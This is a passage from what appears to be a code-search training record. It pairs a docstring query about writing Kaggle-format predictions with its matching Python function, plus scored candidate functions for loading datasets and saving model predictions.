"def unpack_data(imagefile, labelfile):\n\t# Open the images with gzip in read binary mode\n\timages = open(imagefile, 'rb')\n\tlabels = open(labelfile, 'rb')\n\t# Read the binary data\n\t# We have to get big endian unsigned int. So we need '>I'\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0]\n\n\tif number_of_images != N:\n\t\traise Exception('number of labels did not match the number of images')\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t\tif i % 1000 == 0:\n\t\t\tprint(\"i: %i\" % i)\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\ttmp_pixel = images.read(1) # Just a single byte\n\t\t\t\ttmp_pixel = unpack('>B', tmp_pixel)[0]\n\t\t\t\tx[i][row][col] = tmp_pixel\n\t\ttmp_label = labels.read(1)\n\t\ty[i] = unpack('>B', tmp_label)[0]\n\treturn x, y",
"def read_label_file(self, label_file_name = None): #completed\n if label_file_name is None:\n label_file_name = self.label_file_name\n try:\n label_data = sp.loadmat(label_file_name)['labels'].astype(np.int32)\n return label_data#[:,1], label_data[:,0]#in MATLAB format\n except IOError:\n print \"Unable to open \", label_file_name, \"... Exiting now\"\n sys.exit()",
"def parse_label(self):\n # TODO: make this work with attached labels as well as\n # stand alone labels.\n # Save the RAW full text of the label to self._raw\n input_stream = FileStream(self.infile)\n lexer = ODLv21Lexer(input_stream)\n tokens = CommonTokenStream(lexer)\n\n parser = ODLv21Parser(tokens)\n parse_tree = parser.label()\n self._parse_tree = parse_tree\n visitor = Pds3LabelVisitor()\n visitor.visit(parse_tree)\n return visitor.root_dict",
"def load_labels(filename):\n\n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read()\n\n magic, n_labels = (struct.unpack('>i', b[i*4:(i+1)*4]) for i in range(2))\n\n assert magic[0] == 2049, \"bad magic number, what do?\"\n\n label_stream = array.array('B', b[8:])\n \n assert len(label_stream) == n_labels[0], \"mismatch in label length\"\n \n # label_stream is actually type array.array, which is iterable surely.\n # i'll convert it anyway...\n return tuple(label_stream)",
"def load_data_part(fname):\n if \"_data\" not in fname:\n return None\n # Read data\n data = pd.read_csv(fname)\n # events file\n events_fname = fname.replace('_data', '_events')\n # read event file\n labels = pd.read_csv(events_fname)\n clean = data.drop(['id'], axis=1) # remove id\n labels = labels.drop(['id'], axis=1) # remove id\n return clean, labels",
"def load_data(self):\n print(\"Loading dataset...\")\n # Load the dataset\n subIDs, data, labels = dl.load_processed_data_N_subjects_allchans(\n '../data_5sec_100Hz_bipolar/', Nsub=14)\n\n if len(data) > 1:\n\n # If more than one patient loaded, append data to single array\n data_arr = np.array(data[0])\n label_arr = labels[0]\n\n for sub in range(1, len(data)):\n data_arr = np.append(data_arr, data[sub], axis=1)\n label_arr = np.append(label_arr, labels[sub], axis=0)\n\n else:\n # Remove the extra dimension at axis=0\n data_array = np.squeeze(data)\n labels = np.squeeze(labels)\n\n # Move trials to the end so data array is 'nchan x timeseries x trials'\n self.data = np.moveaxis(data_arr, 1, -1)\n self.labels = np.array(label_arr)\n\n self.label_strings = dl.available_stringlabels\n\n valid_indices = np.sum(self.labels, axis=0)\n names = [[self.label_strings[i], i, valid_indices[i]] for i in range(len(valid_indices)) if valid_indices[i] > 0]\n print(\"A summary of valid labels is below: \\nFormat: [Label name, label index, Label count]\")\n for i in range(len(names)):\n print(names[i])\n return",
"def load_data(self):\n self.tif_file = self._find_tif_file()\n if self.with_labeling is not None:\n self.colabel_file = self._find_colabeled_file()\n self.colabel_stack = self._load_colabeled_img()\n self.dff, self.indices = self._populate_dff_data()\n self.loaded = True",
"def readData(self):\n f = open(self.filename)\n self.time = []\n self.data = []\n for line in f:\n if line.find('BAD FLAG') > 0:\n self.badValue = float(line.split(':')[1].strip())\n if line.find('LONGITUDE') > 0:\n self.lon = line.split(':')[1].strip()\n if line.find('LATITUDE') > 0:\n self.lat = line.split(':')[1].strip()\n if len(line) > 6 and line[2] == '-' and line[6] == '-':\n parts = line.rsplit(None, 1)\n # data line\n timeStamp = datetime.datetime.strptime(parts[0], '%d-%b-%Y %H')\n t = timeArray.datetimeToEpochTime(timeStamp)\n self.time.append(t)\n val = float(parts[1])\n self.data.append(val)\n\n self.time = np.array(self.time)\n self.data = np.array(self.data)\n # remove bad values\n if self.badValue:\n goodIx = self.data != self.badValue\n self.time = self.time[goodIx]\n self.data = self.data[goodIx]\n self.fileIsRead = True",
"def load_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']",
"def read_stanford_labels():\n # First get the hardi data\n fetch_stanford_hardi()\n hard_img, gtab = read_stanford_hardi()\n\n # Fetch and load\n files, folder = fetch_stanford_labels()\n labels_file = pjoin(folder, \"aparc-reduced.nii.gz\")\n labels_img = nib.load(labels_file)\n return hard_img, gtab, labels_img",
"def load_data_pkl(self):\n pkl_name = '{}/data/mini-imagenet-cache-{}.pkl'.format(self.root_dir, self.split)\n print('Loading pkl dataset: {} '.format(pkl_name))\n\n try:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f, encoding='bytes')\n image_data = data[b'image_data']\n class_dict = data[b'class_dict']\n except:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f)\n image_data = data['image_data']\n class_dict = data['class_dict']\n\n print(data.keys(), image_data.shape, class_dict.keys())\n data_classes = sorted(class_dict.keys()) # sorted to keep the order\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n idxs = class_dict[cls] \n np.random.RandomState(self.seed).shuffle(idxs) # fix the seed to keep label,unlabel fixed\n dataset_l[i] = image_data[idxs[0:self.n_label]]\n if self.n_unlabel>0:\n dataset_u[i] = image_data[idxs[self.n_label:]]\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes\n\n del image_data",
"def getLabeledXYonly(self, trainingData):\r\n labeledData, unlabeledData = trainingData\r\n return labeledData",
"def read_data(self, loc):\n pass",
"def _read_column_labels(self):\n\n # read the label line (should be at row 15 of the file at this point)\n label_list = self._stream_handle.readline().strip().split()\n self.num_columns = len(label_list)\n self._header_dict['labels'] = label_list\n\n # the m_present_time label is required to generate particles, raise an exception if it is not found\n if GliderParticleKey.M_PRESENT_TIME not in label_list:\n raise DatasetParserException('The m_present_time label has not been found, which means the timestamp '\n 'cannot be determined for any particles')\n\n # read the units line (should be at row 16 of the file at this point)\n data_unit_list = self._stream_handle.readline().strip().split()\n data_unit_list_length = len(data_unit_list)\n\n # read the number of bytes line (should be at row 17 of the file at this point)\n num_of_bytes_list = self._stream_handle.readline().strip().split()\n num_of_bytes_list_length = len(num_of_bytes_list)\n\n # number of labels for name, unit, and number of bytes must match\n if data_unit_list_length != self.num_columns or self.num_columns != num_of_bytes_list_length:\n raise DatasetParserException(\"The number of columns in the labels row: %d, units row: %d, \"\n \"and number of bytes row: %d are not equal.\"\n % (self.num_columns, data_unit_list_length, num_of_bytes_list_length))\n\n # if the number of columns from the header does not match that in the data, but the rest of the file has\n # the same number of columns in each line this is not a fatal error, just parse the columns that are present\n if self._header_dict['sensors_per_cycle'] != self.num_columns:\n msg = 'sensors_per_cycle from header %d does not match the number of data label columns %d' % \\\n (self._header_dict['sensors_per_cycle'], self.num_columns)\n self._exception_callback(SampleException(msg))\n\n log.debug(\"Label count: %d\", self.num_columns)",
"def load_data(self):\n print('Loading {} dataset'.format(self.split))\n data_split_path = os.path.join(self.root_dir, 'splits', '{}.csv'.format(self.split))\n with open(data_split_path,'r') as f:\n reader = csv.reader(f, delimiter=',')\n data_classes = {}\n for i,row in enumerate(reader):\n if i==0:\n continue\n data_classes[row[1]] = 1\n data_classes = data_classes.keys()\n print(data_classes)\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n im_dir = os.path.join(self.root_dir, 'data/{}/'.format(self.split), cls)\n im_files = sorted(glob.glob(os.path.join(im_dir, '*.jpg')))\n np.random.RandomState(self.seed).shuffle(im_files) # fix the seed to keep label,unlabel fixed\n for j, im_file in enumerate(im_files):\n im = np.array(Image.open(im_file).resize((self.im_width, self.im_height)), \n np.float32, copy=False)\n if j<self.n_label:\n dataset_l[i, j] = im\n else:\n dataset_u[i,j-self.n_label] = im\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes"
] |
[
"0.62985724",
"0.60218835",
"0.5822445",
"0.57796115",
"0.5738949",
"0.5676225",
"0.56441987",
"0.56067234",
"0.55868876",
"0.5516113",
"0.5516113",
"0.54691124",
"0.54412436",
"0.54277503",
"0.54168564",
"0.5415407",
"0.5414791",
"0.54146427",
"0.5388492",
"0.5371088",
"0.5360211",
"0.53376824",
"0.53200287",
"0.5319091",
"0.53183085",
"0.53137285",
"0.5307876",
"0.5250194",
"0.52357775",
"0.5229399"
] |
0.6559793
|
0
|
Writes the predictions in Kaggle format. Given the classifier, output filename, and the speech object, this function write the predictions of the classifier on the test data and writes it to the outputfilename.
|
def write_pred_kaggle_file(cls, outfname, speech):
yp = cls.predict(speech.test_doc_vec)
labels = speech.le.inverse_transform(yp)
f = codecs.open(outfname, 'w')
f.write("FileIndex,Category\n")
for i in range(len(speech.test_fnames)):
fname = speech.test_fnames[i]
f.write(fname + ',' + labels[i] + '\n')
f.close()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_predictions(self,file_path):\n # compute average of predictions\n num_examples = len(self.labels)\n\n if num_examples == 0:\n raise Exception (\"nothing to save\")\n\n def string_to_average(string):\n return np.average(np.array(string.split(\",\"),dtype=float))\n prediction_averages = np.around(map(string_to_average,self.predictions),decimals=3)\n\n # sort by prediction averages\n order = np.flipud(prediction_averages.argsort())\n prediction_averages = prediction_averages[order]\n self.pl_pairs = self.pl_pairs[order]\n self.predictions = self.predictions[order]\n self.labels = self.labels[order]\n # write all of the predictions to the file\n f = open(file_path + \"_predictions.txt\", 'w')\n\n for i in range(num_examples):\n f.write((str(prediction_averages[i]) + \" \"*10)[:10]\n + (str(self.labels[i]) + \" \"*50)[:10]\n + str(self.pl_pairs[i] + \" \"*50)[:50]\n + str(self.predictions[i] + \" \"*50)[:50]\n + \"\\n\")\n\n f.close()\n # write and save some metadata\n\n f = open(file_path + \"_scores.txt\", 'w')\n f.write(\"top 100 score: \")\n f.write(str(self.top_100_score(self.predictions,self.labels)))\n f.write(\"\\nAUC: \")\n f.write(str(self.auc(prediction_averages,self.labels)))\n f.write(\"\\nconfusion matrix: \")\n f.write(str(self.confusion_matrix(prediction_averages,self.labels)))\n f.close()\n\n # write a file in Kaggle MAP{K} submision format\n # the form is:\n # Protein1, Ligand3 Ligand4 Ligand2\n # Protein2, Ligand5 Ligand9 Ligand7\n\n raw_database_array = np.genfromtxt(FLAGS.test_set_file_path, delimiter=',', dtype=str)\n receptor_set = raw_database_array[:,2]\n receptor_set = list(set(map(lambda x:x.split('.')[0].split('/')[-1],receptor_set)))\n submission = {}\n for i in range(num_examples):\n # get the name of the ligand and protein\n ligand,receptor = self.pl_pairs[i].split(',')\n ligand = ligand.split('/')[-1].split('.')[0]\n receptor = receptor.split('/')[-1].split('.')[0]\n # add all protein-ligand pairs to submission\n if not receptor in submission.keys():\n submission[receptor] = {}\n submission[receptor]['ligands'] = [ligand]\n submission[receptor]['score'] = [prediction_averages[i]]\n else:\n submission[receptor]['ligands'].append(ligand)\n submission[receptor]['score'].append(prediction_averages[i])\n \n # write and save submisison to file\n # if failed to predict any liagnd for a receptor\n # use placeholder 'L' as predict result\n # e.g. P1234,L\n with open(file_path+'_submission.csv','w') as f:\n f.write('Id,Expected\\n')\n for key in receptor_set:\n if key in submission.keys():\n ligands = np.array(submission[key]['ligands'])\n scores = np.array(submission[key]['score'])\n ligands = ligands[np.flipud(scores.argsort())]\n f.write(key+','+' '.join(ligands)+'\\n')\n else:\n f.write(key+','+'L'+'\\n')",
"def write_classifier_output(location, folds, labels, predictions, class_probs, names=None):\n with open(os.path.join(location, '-'.join([\"classifier\", \"fold\", \"predictions\"]) + '.txt'), 'w') as out_file:\n for fold in range(folds):\n out_file.write(\"fold \" + str(fold+1) + ':\\n')\n out_file.write(\"{:50} {:<12} {:<12} {:<9} {:<9}\\n\".format(\"recording\", \"prediction\", \"label\", \"class 0\",\n \"class 1\"))\n fold_labels, fold_predictions, fold_class_probs = labels[fold], predictions[fold], class_probs[fold]\n\n if names is not None and len(names) != 0:\n fold_names = np.hstack(names[fold])\n else:\n fold_names = len(fold_predictions) * ['']\n\n for pred_lab_tuple in zip(fold_names, fold_predictions, fold_labels, fold_class_probs[:, 0],\n fold_class_probs[:, 1]):\n (name, pred, label, prob1, prob2) = pred_lab_tuple\n out_file.write(\"{:50} {:<12} {:<12} {:<9.2f} {:<9.2f}\\n\".format(name, pred, label, prob1, prob2))\n out_file.write('\\n')",
"def output_predictions(predictions, output_file=None, output_format=\"plaintext\", info=None):\n\n content = \"\"\n\n if (output_format == \"plaintext\") or (output_format == \"txt\"):\n lines = []\n for k in predictions:\n lines.append(\"- %s: %s\" % (k, predictions[k]))\n content = \"\\n\".join(lines)\n\n elif output_format == \"csv\":\n output = io.StringIO()\n writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)\n writer.writerow([\"label\", \"probability\"])\n for k in predictions:\n writer.writerow([k, float(predictions[k])])\n content = output.getvalue()\n\n elif output_format == \"xml\":\n root = ET.Element(\"predictions\")\n if info is not None:\n for k in info:\n root.set(k, info[k])\n root.set(\"timestamp\", str(datetime.now()))\n for k in predictions:\n p = ET.SubElement(root, \"prediction\")\n p.set(\"label\", k)\n p.text = str(float(predictions[k]))\n content = minidom.parseString(ET.tostring(root)).toprettyxml(indent = \" \")\n\n elif output_format == \"json\":\n data = dict()\n if info is not None:\n info = copy.copy(info)\n else:\n info = dict()\n info[\"timestamp\"] = str(datetime.now())\n data[\"info\"] = info\n data[\"predictions\"] = dict()\n for k in predictions:\n data[\"predictions\"][k] = float(predictions[k])\n content = json.dumps(data)\n\n else:\n raise Exception(\"Unhandled format: %s\" % output_format)\n\n if output_file is None:\n print(content)\n else:\n with open(output_file, \"w\") as of:\n of.write(content)",
"def save(self, output_folder: str, show_confidence: bool = True) -> None:\n if output_folder:\n os.makedirs(output_folder, exist_ok=True)\n\n for i, prediction in enumerate(self._images_prediction_lst):\n image_output_path = os.path.join(output_folder, f\"pred_{i}.jpg\")\n prediction.save(output_path=image_output_path, show_confidence=show_confidence)",
"def write_predictions(self, predictions, file_path=None, is_dict=True, pycm_obj=None):\n\n try:\n super(SequenceClassification, self).write_predictions(\n predictions, file_path=file_path, is_dict=is_dict\n )\n except AttributeError:\n # TODO: Need to Fix\n model_base = ModelBase()\n model_base._log_dir = self._log_dir\n model_base._train_counter = self._train_counter\n model_base.training = self.training\n model_base.write_predictions(predictions, file_path=file_path, is_dict=is_dict)\n\n data_type = \"train\" if self.training else \"valid\"\n\n if pycm_obj is not None:\n stats_file_path = f\"predictions-{data_type}-{self._train_counter.get_display()}-stats\"\n pycm_obj.save_csv(str(Path(self._log_dir) / \"predictions\" / stats_file_path))\n\n confusion_matrix_file_path = (\n f\"predictions-{data_type}-{self._train_counter.get_display()}-confusion_matrix\"\n )\n cls_utils.write_confusion_matrix_to_csv(\n str(Path(self._log_dir) / \"predictions\" / confusion_matrix_file_path), pycm_obj\n )",
"def output_predictions(predictions_file, relations, predictions, test_set_keys, test_labels):\n with codecs.open(predictions_file, 'w', 'utf-8') as f_out:\n for i, (w1, w2) in enumerate(test_set_keys):\n f_out.write('\\t'.join([w1, w2, relations[test_labels[i]], relations[predictions[i]]]) + '\\n')",
"def store_classes_and_predictions(output_file_path, classes, predictions):\n with open(output_file_path, mode='a', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',')\n csvwriter.writerow(['true', 'predicted'])\n for i in range(len(classes)):\n csvwriter.writerow([classes.iloc[i], predictions.iloc[i]])",
"def write_predictions_to_file(predictor, testDataFname, enc, outputFname, features=None):\n\n testData, _, testDataIds, _ = make_data(testDataFname, features=features, enc=enc)\n\n dt = datetime.now()\n predictions = predictor.predict(testData)\n print 'predicting took', datetime.now() - dt\n\n featureSelectionOutput = np.transpose(np.vstack((testDataIds, predictions.round().astype(int))))\n\n with open(outputFname, 'wb') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow(['id', 'loss'])\n writer.writerows(featureSelectionOutput)",
"def save_predictions(model, dataset, output_dir):\n preds = model.predict(dataset, verbose=1)\n preds = scipy.special.softmax(preds, 1) # Apply softmax\n with tf.io.gfile.GFile(os.path.join(output_dir, 'test_preds.pkl'), 'wb') as f:\n pickle.dump(preds, f)",
"def write_predictions(prediction_dic, result_path):\n with open(result_path, 'wb') as outfile:\n outfile.write(bytes('Patient_ID,HPV/p16_status\\n', 'UTF-8'))\n for patient_id, pred in prediction_dic.items():\n outfile.write(bytes(str(patient_id) + ',' + str(pred) + '\\n', 'UTF-8'))",
"def save_predictions_in_panoptic_format(model,\n checkpoint_name,\n data_split,\n score_threshold,\n global_step):\n\n dataset = model.dataset\n # Round this because protobuf encodes default values as full decimal\n score_threshold = round(score_threshold, 3)\n\n # Get available prediction folders\n predictions_root_dir = pplp.root_dir() + '/data/outputs/' + \\\n checkpoint_name + '/predictions'\n\n final_predictions_root_dir = predictions_root_dir + \\\n '/final_predictions_and_scores/' + dataset.data_split\n\n final_predictions_dir = final_predictions_root_dir + \\\n '/' + str(global_step)\n\n # 3D prediction directories\n panoptic_predictions_3d_dir = predictions_root_dir + \\\n '/panoptic_pplp_eval/' + \\\n str(score_threshold) + '/' + \\\n str(global_step) + '/data'\n\n if not os.path.exists(panoptic_predictions_3d_dir):\n os.makedirs(panoptic_predictions_3d_dir)\n\n # Do conversion\n num_samples = dataset.num_samples\n num_valid_samples = 0\n\n print('\\nGlobal step:', global_step)\n print('Converting detections from:', final_predictions_dir)\n\n print('3D Detections being saved to:', panoptic_predictions_3d_dir)\n\n for sample_idx in range(num_samples):\n # Print progress\n sys.stdout.write('\\rConverting {} / {}'.format(\n sample_idx + 1, num_samples))\n sys.stdout.flush()\n\n sample_name = dataset.sample_names[sample_idx]\n\n prediction_file = sample_name + '.txt'\n\n panoptic_predictions_3d_file_path = panoptic_predictions_3d_dir + \\\n '/' + prediction_file\n\n predictions_file_path = final_predictions_dir + \\\n '/' + prediction_file\n\n # If no predictions, skip to next file\n if not os.path.exists(predictions_file_path):\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n all_predictions = np.loadtxt(predictions_file_path)\n\n # # Swap l, w for predictions where w > l\n # swapped_indices = all_predictions[:, 4] > all_predictions[:, 3]\n # fixed_predictions = np.copy(all_predictions)\n # fixed_predictions[swapped_indices, 3] = all_predictions[\n # swapped_indices, 4]\n # fixed_predictions[swapped_indices, 4] = all_predictions[\n # swapped_indices, 3]\n\n all_predictions = np.array(all_predictions)\n\n # change 1D array in to 2D array even if it has only one row.\n if len(all_predictions.shape) == 1:\n all_predictions.shape = (1, -1)\n\n score_filter = all_predictions[:, 7] >= score_threshold\n all_predictions = all_predictions[score_filter]\n # If no predictions, skip to next file\n if len(all_predictions) == 0:\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n # Project to image space\n sample_name = prediction_file.split('.')[0]\n img_idx = int(sample_name)\n\n # Load image for truncation\n image = Image.open(dataset.get_rgb_image_path(sample_name))\n\n stereo_calib_p2 = calib_panoptic_utils.read_calibration(dataset.calib_dir,\n img_idx).HD_11\n\n boxes = []\n image_filter = []\n for i in range(len(all_predictions)):\n box_3d = all_predictions[i, 0:7]\n img_box = box_3d_panoptic_projector.project_to_image_space(\n box_3d, stereo_calib_p2,\n truncate=True, image_size=image.size)\n\n # Skip invalid boxes (outside image space)\n if img_box is None:\n image_filter.append(False)\n print('**ERROR img_box = ', img_box)\n continue\n\n image_filter.append(True)\n boxes.append(img_box)\n\n boxes = np.asarray(boxes)\n all_predictions = all_predictions[image_filter]\n\n # If no predictions, skip to next file\n if len(boxes) == 0:\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n num_valid_samples += 1\n\n # To keep each value in its appropriate position, an array of zeros\n # (N, 16) is allocated but only values [4:16] are used\n panoptic_predictions = np.zeros([len(boxes), 16])\n\n # Get object types\n all_pred_classes = all_predictions[:, 8].astype(np.int32)\n obj_types = [dataset.classes[class_idx]\n for class_idx in all_pred_classes]\n\n # Truncation and Occlusion are always empty (see below)\n\n # Alpha (Not computed)\n panoptic_predictions[:, 3] = -10 * np.ones((len(panoptic_predictions)),\n dtype=np.int32)\n\n # 2D predictions\n panoptic_predictions[:, 4:8] = boxes[:, 0:4]\n\n # 3D predictions\n # (l, w, h)\n panoptic_predictions[:, 8] = all_predictions[:, 5]\n panoptic_predictions[:, 9] = all_predictions[:, 4]\n panoptic_predictions[:, 10] = all_predictions[:, 3]\n # (x, y, z)\n panoptic_predictions[:, 11:14] = all_predictions[:, 0:3]\n # (ry, score)\n panoptic_predictions[:, 14:16] = all_predictions[:, 6:8]\n\n # Round detections to 3 decimal places\n panoptic_predictions = np.round(panoptic_predictions, 3)\n\n # Empty Truncation, Occlusion\n panoptic_empty_1 = -1 * np.ones((len(panoptic_predictions), 2),\n dtype=np.int32)\n\n # Stack 3D predictions text\n panoptic_text_3d = np.column_stack([obj_types,\n panoptic_empty_1,\n panoptic_predictions[:, 3:16]])\n\n # Save to text files\n np.savetxt(panoptic_predictions_3d_file_path, panoptic_text_3d,\n newline='\\r\\n', fmt='%s')\n\n print('\\nNum valid:', num_valid_samples)\n print('Num samples:', num_samples)",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(zip(y_pred))\n out.close()",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(list(zip(y_pred)))\n out.close()",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(list(zip(y_pred)))\n out.close()",
"def write_predictions(all_examples, all_features, all_results, n_best_size,\n max_answer_length, do_lower_case, output_prediction_file,\n output_nbest_file, verbose_logging):\n logger.info(\"Writing predictions to: %s\" % (output_prediction_file))\n logger.info(\"Writing nbest to: %s\" % (output_nbest_file))\n\n example_index_to_features = collections.defaultdict(list)\n for feature in all_features:\n example_index_to_features[feature.example_index].append(feature)\n\n unique_id_to_result = {}\n for result in all_results:\n unique_id_to_result[result.unique_id] = result\n\n _PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"PrelimPrediction\",\n [\"feature_index\", \"start_index\", \"end_index\", \"start_logit\", \"end_logit\", \"label_logit\"])\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n for (example_index, example) in enumerate(all_examples):\n features = example_index_to_features[example_index]\n\n prelim_predictions = []\n for (feature_index, feature) in enumerate(features):\n result = unique_id_to_result[feature.unique_id]\n\n start_indexes = _get_best_indexes(result.start_logits, n_best_size)\n end_indexes = _get_best_indexes(result.end_logits, n_best_size)\n for start_index in start_indexes:\n for end_index in end_indexes:\n # We could hypothetically create invalid predictions, e.g., predict\n # that the start of the span is in the question. We throw out all\n # invalid predictions.\n if start_index >= len(feature.tokens):\n continue\n if end_index >= len(feature.tokens):\n continue\n if start_index not in feature.token_to_orig_map:\n continue\n if end_index not in feature.token_to_orig_map:\n continue\n if not feature.token_is_max_context.get(start_index, False):\n continue\n if end_index < start_index:\n continue\n length = end_index - start_index + 1\n if length > max_answer_length:\n continue\n prelim_predictions.append(\n _PrelimPrediction(\n feature_index=feature_index,\n start_index=start_index,\n end_index=end_index,\n start_logit=result.start_logits[start_index],\n end_logit=result.end_logits[end_index],\n label_logit=result.label_logits))\n\n prelim_predictions = sorted(\n prelim_predictions,\n key=lambda x: (x.start_logit + x.end_logit),\n reverse=True)\n\n _NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"NbestPrediction\", [\"text\", \"start_logit\", \"end_logit\", \"label_logit\"])\n\n seen_predictions = {}\n nbest = []\n for pred in prelim_predictions:\n if len(nbest) >= n_best_size:\n break\n feature = features[pred.feature_index]\n\n tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]\n orig_doc_start = feature.token_to_orig_map[pred.start_index]\n orig_doc_end = feature.token_to_orig_map[pred.end_index]\n orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]\n tok_text = \" \".join(tok_tokens)\n\n # De-tokenize WordPieces that have been split off.\n tok_text = tok_text.replace(\" ##\", \"\")\n tok_text = tok_text.replace(\"##\", \"\")\n\n # Clean whitespace\n tok_text = tok_text.strip()\n tok_text = \" \".join(tok_text.split())\n orig_text = \" \".join(orig_tokens)\n\n final_text = get_final_text(tok_text, orig_text, do_lower_case, verbose_logging)\n if final_text in seen_predictions:\n continue\n\n seen_predictions[final_text] = True\n nbest.append(\n _NbestPrediction(\n text=final_text,\n start_logit=pred.start_logit,\n end_logit=pred.end_logit,\n label_logit=pred.label_logit))\n\n # In very rare edge cases we could have no valid predictions. So we\n # just create a nonce prediction in this case to avoid failure.\n if not nbest:\n nbest.append(\n _NbestPrediction(text=\"empty\", start_logit=0.0, end_logit=0.0, label_logit=0.0))\n\n assert len(nbest) >= 1\n\n total_scores = []\n for entry in nbest:\n total_scores.append(entry.start_logit + entry.end_logit)\n\n probs = _compute_softmax(total_scores)\n\n nbest_json = []\n for (i, entry) in enumerate(nbest):\n output = collections.OrderedDict()\n output[\"text\"] = entry.text\n output[\"probability\"] = probs[i]\n output[\"start_logit\"] = entry.start_logit\n output[\"end_logit\"] = entry.end_logit\n output[\"label_logit\"] = entry.label_logit\n nbest_json.append(output)\n\n assert len(nbest_json) >= 1\n\n if nbest_json[0][\"label_logit\"] and (example.qas_id not in all_predictions.keys() or all_nbest_json[example.qas_id][0][\"probability\"] < nbest_json[0][\"probability\"]):\n all_predictions[example.qas_id] = nbest_json[0][\"text\"]\n all_nbest_json[example.qas_id] = nbest_json\n\n with open(output_prediction_file, \"w\") as writer:\n writer.write(json.dumps(all_predictions, indent=4) + \"\\n\")\n\n with open(output_nbest_file, \"w\") as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + \"\\n\")",
"def predict(self):\n train_vec, test_vec = self.get_tfidf_vectors()\n clf = self.get_classifier()\n\n print '-'*40\n print 'Making predictions ...'\n clf.fit(train_vec, self.train_ans)\n clf_predictions = clf.predict_proba(test_vec)\n\n print 'Storing predictions in', self.pred_file\n pred_out = [\"Id,predictions\"]\n num_pred = range(30)\n for fid, pred in zip(self.test_index, clf_predictions):\n top_rec = sorted(num_pred, key=lambda k: pred[k], reverse=True)[:3]\n pred_out.append(\"%s,%s\" % (fid, ' '.join( [clf.classes_[rec] for rec in top_rec] )))\n with open(self.pred_file, 'w') as f:\n f.write('%s\\n' % ('\\n'.join(pred_out)))",
"def save_predictions(predictions, img_paths, output_dir='predictions'):\n\n print(f'\\nSaving prediction to {output_dir} ...')\n\n if not osp.exists(output_dir):\n os.mkdir(output_dir)\n\n for pred, img_path in tqdm(zip(predictions, img_paths), total=len(predictions)):\n img_name = osp.basename(img_path)\n pred = pred.astype('uint8')\n Image.fromarray(pred * 255).save(osp.join(output_dir, img_name))",
"def save_predictions(gtfilename, loss_type, probs, preds, outfile):\n\n # 1. get file ids\n liste_fileids = []\n targets = []\n passFirstLine=True\n with open(gtfilename, 'r') as fh:\n for line in fh:\n if passFirstLine:\n passFirstLine = False\n continue\n tmp = line.rstrip().split(',')\n liste_fileids.append(tmp[0])\n targets.append(tmp[1])\n\n print 'liste_fileids', len(liste_fileids)\n # 2. save preds\n import csv\n with open(outfile, 'w') as csvfile:\n # fieldnames = ['itemid', 'hasbird', 'pred', 'gt']\n fieldnames = ['itemid', 'hasbird']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n if loss_type == 'categorical_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i, 1], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i, 1]})\n elif loss_type == 'binary_hinge' or loss_type == 'binary_crossentropy' or loss_type == 'weighted_binary_crossentropy':\n for i, id in enumerate(liste_fileids):\n # 